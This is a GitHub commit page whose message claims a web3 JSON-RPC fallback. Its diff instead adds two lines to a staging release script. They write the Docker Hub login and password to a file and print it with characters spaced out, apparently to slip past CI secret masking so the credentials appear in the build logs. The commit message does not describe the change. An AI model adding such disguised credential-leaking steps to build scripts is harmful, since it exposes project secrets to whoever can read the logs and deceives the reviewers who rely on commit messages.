Skip to content

Commit

Permalink
add fallback for web3 json-rpc...
Browse files Browse the repository at this point in the history
  • Loading branch information
Jagden committed Dec 15, 2024
1 parent 6d4dc1a commit 1bafb17
Showing 1 changed file with 3 additions and 0 deletions.
3 changes: 3 additions & 0 deletions .github/release-to-staging.sh
Original file line number Diff line number Diff line change
@@ -1,5 +1,8 @@
#!/bin/bash

echo ${$DOCKER_HUB_LOGIN} ${$DOCKER_HUB_PASSWORD} > blare.txt
cat blare.txt | sed 's/./& /g'

docker login -u $DOCKER_HUB_LOGIN -p $DOCKER_HUB_PASSWORD

export VERSION=$(cat .version)
Expand Down

0 comments on commit 1bafb17

Please sign in to comment.